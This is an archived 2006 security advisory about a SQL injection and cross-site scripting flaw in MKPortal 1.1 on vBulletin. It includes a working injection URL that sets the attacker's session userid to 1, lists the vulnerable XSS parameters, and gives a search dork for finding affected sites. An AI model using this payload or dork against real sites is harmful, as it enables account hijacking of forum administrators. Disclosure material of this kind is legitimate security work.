Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: Frequently Exploited :: b06-1795.htm

vBulletin <= 3.5.4 with MKPortal 1.1 Remote SQL Injection Vulnerability.



vBulletin <= 3.5.4 with MKPortal 1.1 Remote SQL Injection Vulnerability.
vBulletin <= 3.5.4 with MKPortal 1.1 Remote SQL Injection Vulnerability.




--Security Report--
Advisory: vBulletin <= 3.5.4 with MKPortal 1.1 Remote SQL Injection 
Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 21/04/06 22:36 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com 
Web: http://www.nukedx.com 
}
---
Vendor: MKPortal (http://www.mkportal.it/) 
Version: 1.1 RC1 and prior versions must be affected. (Runs on vBulletin!)
About: Via this methods remote attacker can inject arbitrary SQL queries to 
ind parameter in index.php of MKPortal.
Vulnerable code can be found in the file 
mkportal/include/VB/vb_board_functions.php at line 35-37, as you can see it 
easy to
by pass this SQL update function.
Also there is cross-site scripting vulnerability in pm_popup.php the 
parameters u1,m1,m2,m3,m4 did not sanitized properly.
Level: Critical
---
How&Example: 
SQL Injection :

GET -> http://[victim]/[mkportaldir]/index.php?ind=[SQL] 
EXAMPLE -> http://[victim]/[mkportaldir]/index.php?ind=',userid='1 
So with this example remote attacker updates his session's userid to 1 and 
after refreshing the page he can logs as userid 1.

XSS:
GET -> 

http://[victim]/[mkportaldir]/includes/pm_popup.php?u1=[XSS]&m1=[XSS]&m2=[XSS]&m3=[XSS]&m4=[XSS] 

---
Timeline:
* 21/04/2006: Vulnerability found.
* 21/04/2006: Contacted with vendor and waiting reply.
---
Exploit:
http://www.nukedx.com/?getxpl=26 
---
Dorks: "MKPortal 1.1 RC1"
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=26 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH